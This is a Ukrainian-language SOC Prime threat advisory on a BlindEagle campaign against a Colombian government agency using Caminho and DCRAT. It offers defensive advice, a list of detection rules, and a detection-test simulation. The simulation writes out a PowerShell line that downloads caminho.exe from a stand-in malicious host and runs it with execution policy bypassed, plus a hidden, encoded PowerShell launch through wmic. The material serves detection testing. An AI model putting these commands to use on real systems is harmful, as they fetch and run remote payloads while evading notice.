SOC Prime Bias: Критичний

17 Dec 2025 14:04 UTC

BlindEagle націлюється на державну агенцію Колумбії за допомогою Caminho та DCRAT

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
BlindEagle націлюється на державну агенцію Колумбії за допомогою Caminho та DCRAT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Короткий огляд

BlindEagle провела операцію зі спір-фішингу, спрямовану на державну агенцію Колумбії, поширивши зброєний SVG-вкладення, що ініціювало ланцюг виконання JavaScript до PowerShell. Цей ланцюг завантажив загрузник, названий Caminho, який потім отримав троян віддаленого доступу з відкритим кодом DCRAT, розміщений на Discord. Завершальна стадія використовувала процесинг hollowing у MSBuild.exe і застосовувала кілька методів ухилення для зменшення виявлення.

Розслідування

Zscaler ThreatLabz проаналізувала ланцюг зараження і повідомила про методику сховання SVG, кілька рівнів обфускації JavaScript, команду PowerShell, викликану через WMI, і доставку Caminho через URL, розміщений на Discord. Розслідування також пов’язало підтримуючу інфраструктуру зі шведськими IP-адресами та динамічним DNS-провайдером (ydns.eu).

Узагальнення

Запровадьте суворіші дії для вхідних вкладень електронної пошти — особливо для SVG-вмісту — і забезпечте знешкодження/перевірку вмісту для вбудованих скриптів. Використовуйте політики веб-проксі для обмеження доступу до підозрілих кінцевих точок з розміщення файлів, включаючи URL-адреси Discord, які використовуються для доставки шкідливого програмного забезпечення. Моніторте незвичайні шаблони виконання PowerShell та WMI і впроваджуйте політики списків дозволених додатків, що охоплюють використання MSBuild.exe.

Відповідь

Відповідь

Активуйте сигналізації для шкідливого артефакту SVG, згаданого імені JavaScript-файлу та завантажень, що досягають URL-адреси Discord. Проводьте пошуки залишків Caminho та DCRAT у пам’яті або на диску, свідчень процесингу hollowing MSBuild.exe та стійкості через зміни реєстру або заплановані завдання. Карантинизуйте уражені кінцеві точки та блокуйте визначений домен C2.

Потік атаки

Детекції

Підозрілі рядки PowerShell (через powershell)

Команда SOC Prime
17 грудня 2025

LOLBAS WScript / CScript (через процес створення)

Команда SOC Prime
17 грудня 2025

Можливо, Інтернет Архіву, вирішено за незвичним процесом (через dns_query)

Команда SOC Prime
17 грудня 2025

Виклик підозрілих методів .NET із PowerShell (через powershell)

Команда SOC Prime
17 грудня 2025

IOC (HashMd5) для детекції: BlindEagle націлює державну агенцію Колумбії з використанням Caminho і DCRAT

Правила SOC Prime AI
17 грудня 2025

IOC (SourceIP) для детекції: BlindEagle націлює державну агенцію Колумбії з використанням Caminho і DCRAT

Правила SOC Prime AI
17 грудня 2025

IOC (HashSha1) для детекції: BlindEagle націлює державну агенцію Колумбії з використанням Caminho і DCRAT

Правила SOC Prime AI
17 грудня 2025

IOC (HashSha256) для детекції: BlindEagle націлює державну агенцію Колумбії з використанням Caminho і DCRAT

Правила SOC Prime AI
17 грудня 2025

IOC (DestinationIP) для детекції: BlindEagle націлює державну агенцію Колумбії з використанням Caminho і DCRAT

Правила SOC Prime AI
17 грудня 2025

Детекція команди PowerShell BlindEagle, що використовує WMI [Windows Powershell]

Правила SOC Prime AI
17 грудня 2025

Виконання симуляції

Передумова: Перевірка телеметрії та базового рівня повинна бути успішною.

Пояснення: Цей розділ деталізує точне виконання техніки противника (TTP), спроектованої для активації правила детекції. Команди та наратив повинні прямо відображати заплановані TTP і намагатися генерацію точної телеметрії, яку очікує логіка детекції.

  • Атака Narrative & Команди:
    Атакуючий (BlindEagle) використовує WMI для запуску процесу PowerShell, що завантажує навантаження “Caminho” з віддаленого серверу C2 та виконує його в пам’яті. Використовуючи wmic.exe з методом процес call create , зловмисник може запустити PowerShell без взаємодії з користувацькою сесією, що робить активність прихованою. У командному рядку міститься дослівне слово “powershell”, яке відповідає умовам правила детекції.

    1. Етап 1 – Підготувати шкідливий PowerShell one-liner:

      $url = "http://malicious.example.com/caminho.exe"
      $out = "$env:TEMPcaminho.exe"
      Invoke-WebRequest -Uri $url -OutFile $out; PowerShell -ExecutionPolicy Bypass -File $out
    2. Етап 2 – Виконати через WMI:

      $psCmd = 'powershell -nop -w hidden -enc '
      wmic process call create "$psCmd"

    Наявність powershell в полі CommandLine події Sysmon Event 1, згенерована дочірнім процесом wmic , активує правило.

  • Скрипт регресійного тесту:

    # Симуляція PowerShell через WMI на прикладі BlindEagle
    # ----------------------------------------------------------------------
    # 1. Визначте шкідливе навантаження (для тесту ми використовуємо безпечну echo-команду)
    $payload = 'Write-Host "Simulated Caminho execution"'
    $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
    
    # 2. Створіть командний рядок PowerShell, який включає дослівне слово "powershell"
    $psCommand = "powershell -NoProfile -EncodedCommand $encoded"
    
    # 3. Запустіть команду через WMI (wmic) для генерації події Sysmon EventID 1
    $wmicCommand = "wmic process call create `"$psCommand`""
    Write-Host "Виконання через WMI: $wmicCommand"
    Invoke-Expression $wmicCommand
    
    # 4. Додатково: Запишіть у консоль для підтвердження
    Write-Host "Симуляція завершена. Перевірте детекцію в SIEM."
  • Команди прибирання:

    # Видаліть будь-які тимчасові файли (жоден не створено у цій симуляції)
    # Припиніть будь-які довготривалі процеси wmic або PowerShell, які використовувалися для тесту
    Get-Process -Name wmic, powershell -ErrorAction SilentlyContinue | Stop-Process -Force
    Write-Host "Прибирання завершено."